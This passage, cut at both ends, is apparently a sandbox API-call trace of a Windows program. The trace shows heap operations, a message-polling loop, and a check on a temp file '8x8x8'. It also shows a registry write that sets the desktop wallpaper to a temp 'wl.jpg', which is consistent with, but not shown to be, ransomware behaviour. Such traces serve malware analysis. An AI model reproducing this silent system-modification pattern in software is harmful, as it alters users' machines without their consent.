hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0279.618] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0279.618] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0279.618] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0279.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0279.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0279.619] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0279.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0279.619] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0279.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0279.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0279.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0279.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0279.620] timeGetTime () returned 0x11860e8 [0279.620] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.620] Sleep (dwMilliseconds=0xa) [0279.698] timeGetTime () returned 0x1186137 [0279.698] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.698] Sleep (dwMilliseconds=0xa) [0279.767] timeGetTime () returned 0x118617d [0279.767] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.768] Sleep (dwMilliseconds=0xa) [0279.823] timeGetTime () returned 0x11861b3 [0279.823] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.823] Sleep (dwMilliseconds=0xa) [0279.894] timeGetTime () returned 0x11861fb [0279.894] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.894] Sleep (dwMilliseconds=0xa) [0279.964] timeGetTime () returned 0x1186241 [0279.964] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0279.964] Sleep (dwMilliseconds=0xa) [0280.053] timeGetTime () returned 0x118629a [0280.053] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.053] Sleep (dwMilliseconds=0xa) [0280.155] timeGetTime () returned 0x11862ff [0280.155] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.155] Sleep (dwMilliseconds=0xa) [0280.194] timeGetTime () returned 0x1186326 [0280.194] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.194] Sleep (dwMilliseconds=0xa) [0280.245] timeGetTime () returned 0x118635a [0280.245] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.245] Sleep (dwMilliseconds=0xa) [0280.281] timeGetTime () returned 0x118637d [0280.281] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0280.281] TranslateMessage (lpMsg=0x8cf798) returned 0 [0280.281] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0280.281] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0280.281] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0280.281] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.281] Sleep (dwMilliseconds=0xa) [0280.317] timeGetTime () returned 0x11863a1 [0280.317] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.317] Sleep (dwMilliseconds=0xa) [0280.353] timeGetTime () returned 0x11863c6 [0280.353] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.353] Sleep (dwMilliseconds=0xa) [0280.546] timeGetTime () returned 0x1186486 [0280.546] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.546] Sleep (dwMilliseconds=0xa) [0280.591] timeGetTime () returned 0x11864b4 [0280.591] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0280.591] Sleep (dwMilliseconds=0xa) [0280.629] timeGetTime () returned 0x11864d9 [0280.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0280.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0280.630] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0280.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0280.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0280.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0280.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0280.630] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0280.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0280.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0280.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0280.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0280.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0280.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0280.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0280.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0280.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0280.631] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0280.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0280.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0280.632] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0280.632] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0280.632] RegCloseKey (hKey=0x2d0) returned 0x0 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0280.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0280.633] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0280.633] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0280.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0280.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0280.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0280.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0280.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0280.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0280.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0280.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0280.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0280.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0280.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0280.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0280.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0280.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0280.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0280.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0280.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0280.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0280.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0280.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 